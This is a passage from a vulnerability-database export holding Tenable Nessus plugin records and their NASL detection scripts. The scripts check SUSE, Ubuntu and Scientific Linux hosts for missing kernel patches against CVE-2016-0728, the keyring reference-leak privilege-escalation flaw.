"published": "2016-01-25T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2016:0186-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0728"], "modified": "2016-01-25T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-default-debugsource", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-default-extra", "p-cpe:/a:novell:suse_linux:kernel-xen", "p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-debugsource", "p-cpe:/a:novell:suse_linux:kernel-xen-base", "p-cpe:/a:novell:suse_linux:kernel-default-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-default", "p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-devel"], "id": "SUSE_SU-2016-0186-1.NASL", "href": "https://www.tenable.com/plugins/nessus/88140", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:0186-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88140);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2016-0728\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2016:0186-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 12 SP1 kernel was updated to receive a\nsecurity fix.\n\nFollowing security bug was fixed :\n\n - A reference leak in keyring handling with\n join_session_keyring() could lead to local attackers\n gain root privileges. (bsc#962075, CVE-2016-0728).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=962075\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-0728/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20160186-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2b46e576\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP1 :\n\nzypper in -t patch SUSE-SLE-WE-12-SP1-2016-124=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP1 :\n\nzypper in -t patch SUSE-SLE-SDK-12-SP1-2016-124=1\n\nSUSE Linux Enterprise Server 12-SP1 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP1-2016-124=1\n\nSUSE Linux Enterprise Module for Public Cloud 12 :\n\nzypper in -t patch SUSE-SLE-Module-Public-Cloud-12-2016-124=1\n\nSUSE Linux Enterprise Live Patching 12 :\n\nzypper in -t patch SUSE-SLE-Live-Patching-12-2016-124=1\n\nSUSE Linux Enterprise Desktop 12-SP1 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-SP1-2016-124=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-base-debuginfo-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"s390x\", reference:\"kernel-default-man-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-base-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-base-debuginfo-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-debuginfo-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-debugsource-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-devel-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-syms-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-debuginfo-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-debugsource-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-devel-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-extra-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-extra-debuginfo-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-syms-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.12.51-60.25.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T15:29:21", "description": "Yevgeny Pats discovered that the session keyring implementation in the\nLinux kernel did not properly reference count when joining an existing\nsession keyring. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-01-20T00:00:00", "title": "Ubuntu 14.04 LTS : linux-lts-wily vulnerability (USN-2872-2)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0728"], "modified": "2016-01-20T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-lowlatency", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2872-2.NASL", "href": "https://www.tenable.com/plugins/nessus/88015", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2872-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88015);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-0728\");\n script_xref(name:\"USN\", value:\"2872-2\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux-lts-wily vulnerability (USN-2872-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Yevgeny Pats discovered that the session keyring implementation in the\nLinux kernel did not properly reference count when joining an existing\nsession keyring. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2872-2/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-4.2-generic,\nlinux-image-4.2-generic-lpae and / or linux-image-4.2-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-0728\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2872-2\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.2.0-25-generic\", pkgver:\"4.2.0-25.30~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.2.0-25-generic-lpae\", pkgver:\"4.2.0-25.30~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.2.0-25-lowlatency\", pkgver:\"4.2.0-25.30~14.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.2-generic / linux-image-4.2-generic-lpae / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T15:29:21", "description": "Yevgeny Pats discovered that the session keyring implementation in the\nLinux kernel did not properly reference count when joining an existing\nsession keyring. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-01-20T00:00:00", "title": "Ubuntu 14.04 LTS : linux vulnerability (USN-2870-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0728"], "modified": "2016-01-20T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-lowlatency", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2870-1.NASL", "href": "https://www.tenable.com/plugins/nessus/88010", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2870-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88010);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-0728\");\n script_xref(name:\"USN\", value:\"2870-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux vulnerability (USN-2870-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Yevgeny Pats discovered that the session keyring implementation in the\nLinux kernel did not properly reference count when joining an existing\nsession keyring. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2870-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-3.13-generic,\nlinux-image-3.13-generic-lpae and / or linux-image-3.13-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-0728\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2870-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-76-generic\", pkgver:\"3.13.0-76.120\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-76-generic-lpae\", pkgver:\"3.13.0-76.120\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-76-lowlatency\", pkgver:\"3.13.0-76.120\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.13-generic / linux-image-3.13-generic-lpae / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:49:07", "description": "* A use-after-free flaw was found in the way the Linux kernel's key\nmanagement subsystem handled keyring object reference counting in\ncertain error path of the join_session_keyring() function. A local,\nunprivileged user could use this flaw to escalate their privileges on\nthe system. (CVE-2016-0728, Important)\n\nThe system must be rebooted for this update to take effect.", "edition": 17, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-01-26T00:00:00", "title": "Scientific Linux Security Update : kernel on SL7.x x86_64 (20160125)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0728"], "modified": "2016-01-26T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-abi-whitelists", "p-cpe:/a:fermilab:scientific_linux:kernel", "p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo", "p-cpe:/a:fermilab:scientific_linux:python-perf-debuginfo", "p-cpe:/a:fermilab:scientific_linux:perf-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-debug", "p-cpe:/a:fermilab:scientific_linux:kernel-headers", "p-cpe:/a:fermilab:scientific_linux:python-perf", "p-cpe:/a:fermilab:scientific_linux:kernel-devel", "p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel", "p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs-devel", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:kernel-doc", "p-cpe:/a:fermilab:scientific_linux:perf", "p-cpe:/a:fermilab:scientific_linux:kernel-tools-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-tools", "p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs"], "id": "SL_20160125_KERNEL_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/88174", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88174);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-0728\");\n\n script_name(english:\"Scientific Linux Security Update : kernel on SL7.x x86_64 (20160125)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"* A use-after-free flaw was found in the way the Linux kernel's key\nmanagement subsystem handled keyring object reference counting in\ncertain error path of the join_session_keyring() function. A local,\nunprivileged user could use this flaw to escalate their privileges on\nthe system. (CVE-2016-0728, 